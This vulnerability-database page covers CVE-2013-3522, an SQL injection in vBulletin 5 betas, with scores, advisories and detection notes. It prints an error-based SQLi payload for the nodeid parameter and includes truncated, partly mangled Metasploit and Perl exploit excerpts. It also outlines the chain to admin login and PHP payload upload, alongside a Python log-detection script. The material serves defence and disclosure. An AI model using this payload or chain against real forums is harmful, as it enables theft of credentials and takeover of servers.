CVE-2013-3522
Published 2013-05-10
Priority: P2 · 66 · medium · 6.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 27.08% (97.8th percentile)
SQL injection vulnerability in index.php/ajax/api/reputation/vote in vBulletin 5.0.0 Beta 11, 5.0.0 Beta 28, and earlier allows remote authenticated users to execute arbitrary SQL commands via the nodeid parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vbulletin | vbulletin | — | — |
Detection & IOCs (extracted from sources)
command: `nodeid=<id>) and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338`
- Monitor POST requests to 'index.php/ajax/api/reputation/vote' with a 'nodeid' parameter containing SQL metacharacters or subquery patterns (e.g., parentheses, SELECT, CONCAT, floor(rand())). A 'Database error in vBulletin' string in the HTTP 200 response body indicates successful blind/error-based SQLi.
- Detect exploitation chain: SQLi on /ajax/api/reputation/vote followed by login attempt to login.php with 'logintype=cplogin' and pre-computed MD5 hash fields ('vb_login_md5password'), then product import via admincp/product.php. This sequence indicates the full RCE exploit chain.
- Alert on multipart POST to admincp/product.php?do=productimport containing an XML file upload ('productfile' field) immediately after an admin login. This is the payload delivery step of the exploit.
- The PoC uses a User-Agent of 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0' for all exploit requests; correlate this UA with POST requests to the vulnerable endpoint.
- The error-based SQLi payload uses the pattern 'floor(rand(0)*2)' combined with GROUP BY to trigger a duplicate-key error; detect this pattern in POST body parameters targeting vBulletin endpoints.
- The exploit has been observed in the wild since March 2013; flag vBulletin 5.0.0 Beta 11 through Beta 28 installations as vulnerable during asset inventory.
- The Metasploit module brute-forces valid node IDs between MINNODE (default 1) and MAXNODE (default 100); defenders should note that the SQLi requires a valid node ID to function, so environments with no public nodes in that range may reduce exploitability.
- The exploit requires the attacker to be a remote authenticated user; unauthenticated exploitation is not indicated by the CVE description.
- The RCE module (vbulletin_vote_sqli_exec) was tested specifically on vBulletin 5.0.0 Beta 13 on Ubuntu Linux; behavior on other OS/version combinations may differ.
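The request sequence in the detection notes above, written as a check over web-server records. This is an added example, not taken from any of the indexed sources; the record fields (`ts`, `src`, `method`, `url`, `body`, `status`, `resp`) and the correlation by source IP are assumptions, and the sample records are constructed.

```python
import re
from urllib.parse import parse_qs, urlencode

VOTE = "index.php/ajax/api/reputation/vote"
# A legitimate nodeid is a plain integer; these are the markers the page lists.
SQLI = re.compile(r"floor\s*\(\s*rand\s*\(|\bselect\b|\bconcat\s*\(|[()]", re.I)
CHAIN = ["sqli", "cp_login", "product_import"]  # order of the full chain

def classify(ev):
    """Label one POST record with the exploit-chain stage it matches, or None."""
    if ev["method"] != "POST":
        return None
    path, _, query = ev["url"].partition("?")
    form = parse_qs(ev.get("body", ""))
    if path.endswith(VOTE):
        nodeid = form.get("nodeid", [""])[0]
        if not nodeid.isdigit() and SQLI.search(nodeid):
            leaked = ev["status"] == 200 and "Database error in vBulletin" in ev.get("resp", "")
            return "sqli_success" if leaked else "sqli_attempt"
    elif path.endswith("login.php"):
        if form.get("logintype") == ["cplogin"] and "vb_login_md5password" in form:
            return "cp_login"
    elif path.endswith("admincp/product.php") and "do=productimport" in query:
        return "product_import"
    return None

def detect(events):
    """Return (src, finding) pairs; 'full_chain' when one source hits all stages in order."""
    progress, findings = {}, []
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev)
        if stage is None:
            continue
        findings.append((ev["src"], stage))
        step = progress.get(ev["src"], 0)
        if stage.startswith(CHAIN[step]):
            progress[ev["src"]] = (step + 1) % len(CHAIN)
            if step + 1 == len(CHAIN):
                findings.append((ev["src"], "full_chain"))
    return findings

# Constructed sample records (not real traffic); field names are assumptions.
SAMPLE = [
    {"ts": 1, "src": "203.0.113.5", "method": "POST", "url": "/" + VOTE, "status": 200,
     "body": urlencode({"nodeid": "7) and(select 1 from(select count(*),floor(rand(0)*2))x)a"}),
     "resp": "Database error in vBulletin"},
    {"ts": 2, "src": "203.0.113.5", "method": "POST", "url": "/login.php", "status": 200,
     "body": urlencode({"logintype": "cplogin", "vb_login_md5password": "0" * 32})},
    {"ts": 3, "src": "203.0.113.5", "method": "POST", "status": 200,
     "url": "/admincp/product.php?do=productimport", "body": ""},
    {"ts": 4, "src": "198.51.100.9", "method": "POST", "url": "/" + VOTE, "status": 200,
     "body": "nodeid=42", "resp": "{}"},
]
```

Correlating on source IP alone misses a chain whose steps arrive from different addresses, so the per-request findings are reported as well as `full_chain`.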
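CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
| vulncheck | — | 6.5 | MEDIUM | — |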
GHSA
GHSA-hppw-jmc4-w4gv: SQL injection vulnerability in index
ghsa_unreviewed·2022-05-17
CVE-2013-3522 [MEDIUM] CWE-89
SQL injection vulnerability in index.php/ajax/api/reputation/vote in vBulletin 5.0.0 Beta 11, 5.0.0 Beta 28, and earlier allows remote authenticated users to execute arbitrary SQL commands via the nodeid parameter.
VulnCheck
vBulletin vBulletin Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2013·CVSS 6.5
CVE-2013-3522 [MEDIUM]
SQL injection vulnerability in index.php/ajax/api/reputation/vote in vBulletin 5.0.0 Beta 11, 5.0.0 Beta 28, and earlier allows remote authenticated users to execute arbitrary SQL commands via the nodeid parameter.
Affected: vBulletin vBulletin
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.exploit-db.com/exploits/30212
No detection rules found.
Exploit-DB
vBulletin 5 - 'index.php/ajax/api/reputation/vote?nodeid' SQL Injection (Metasploit)
exploitdb·2013-12-11
CVE-2013-3522
---
```ruby
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability found in vBulletin 5 that has
been used in the wild since March 2013. This module uses the sqli to extract the
web application's usernames and hashes. With the retrieved information tries to
log into the admin control panel in order to deploy the PHP payload. This module
has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu
Linux distribution.
},
'Author'
```
Exploit-DB
vBulletin 5.0.0 Beta 11 < 5.0.0 Beta 28 - SQL Injection
exploitdb·2013-03-25
CVE-2013-3522
vBulletin 5.0.0 Beta 11 new;
```perl
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
[
'url' => $encpath,
'username' => $username,
'password' => $password,
],
Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
[
'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from informati
```
Metasploit
vBulletin Password Collector via nodeid SQL Injection
metasploit
This module exploits a SQL injection vulnerability found in vBulletin 5 that has been used in the wild since March 2013. This module can be used to extract the web application's usernames and hashes, which could be used to authenticate into the vBulletin admin control panel.
Metasploit
vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection
metasploit
This module exploits a SQL injection vulnerability found in vBulletin 5 that has been used in the wild since March 2013. This module uses the sqli to extract the web application's usernames and hashes. With the retrieved information tries to log into the admin control panel in order to deploy the PHP payload. This module has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu Linux distribution.
No writeups or analysis indexed.